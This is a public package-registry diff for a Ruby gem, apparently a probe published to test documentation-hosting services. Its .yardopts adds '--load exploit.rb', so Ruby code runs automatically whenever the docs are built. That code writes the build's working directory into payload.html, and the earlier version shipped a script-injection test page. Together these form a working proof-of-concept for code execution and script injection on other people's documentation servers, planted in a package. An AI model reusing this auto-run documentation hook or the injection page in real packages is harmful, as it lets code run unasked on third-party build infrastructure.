sampledocpayload624286 0.0.2 → 0.0.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (5) hide show
  1. checksums.yaml +4 -4
  2. data/.yardopts +1 -0
  3. data/exploit.rb +1 -0
  4. data/payload.html +1 -1
  5. metadata +2 -1
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: bc892207bd59b4751678a24d55befe5d662dccaa9b8fe38572339280da9ac24f
4
- data.tar.gz: 19ce60b0fd3655a4e8cd5b037b0fadaef36f73d0baf7c619306145e40a4de3ff
3
+ metadata.gz: 13db93e80b3f397829fc533767cd9a2a0b9853b653274c3560cb1ba4b2d162f3
4
+ data.tar.gz: 6fe82bb8761824344a0742aad22c772dd2ad468cfcde203186c36bb2fd91f0d6
5
5
  SHA512:
6
- metadata.gz: e3e1e31d0e743e07e1caa52358b4769093e1e2c2436b8d16c5c29945c6bf87b2cd309f7898640ec25a511048b3daf81439debf57221abe5e41269ad2fc036224
7
- data.tar.gz: e50331767fa5ce466bbf2af3046c4322bfc460dd262921fc678bd1b7453877ad02fa08e6c1eefc331f51f6c921f595c58d8bd4b887b91fc4ec317c1042b0a75b
6
+ metadata.gz: 3b5d3709ba73ea04bfc2ac6db1f11d2c9c4ab0c306c6bdda84a207dcceeb932387fd2ec10bd175899ce0995cee8e2380e0aef674ec785d324b4a4918065c7ba6
7
+ data.tar.gz: be57d4a2371d3f49b4f1fdeb17071e259eb555a14de76e8266319284f9c8ad8e9461005091e782782fd48d438bac1935bb57689e35e587011dfb920faa193453
data/.yardopts CHANGED
@@ -1,3 +1,4 @@
1
1
  --main README.md
2
2
  --markup markdown
3
+ --load exploit.rb
3
4
  --asset payload.html:payload.html
data/exploit.rb ADDED
@@ -0,0 +1 @@
1
+ File.write('payload.html', "<h1>EXECUTED #{Time.now} pwd #{Dir.pwd}</h1>")
data/payload.html CHANGED
@@ -1 +1 @@
1
- <!doctype html><html><body><h1>Payload works</h1><script>document.write(' JSOK '+(2+3))</script></body></html>
1
+ <h1> ORIGINAL-V4 </h1>
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: sampledocpayload624286
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.0.2
4
+ version: 0.0.4
5
5
  platform: ruby
6
6
  authors:
7
7
  - x
@@ -19,6 +19,7 @@ extra_rdoc_files:
19
19
  files:
20
20
  - ".yardopts"
21
21
  - README.md
22
+ - exploit.rb
22
23
  - lib/sample.rb
23
24
  - payload.html
24
25
  homepage: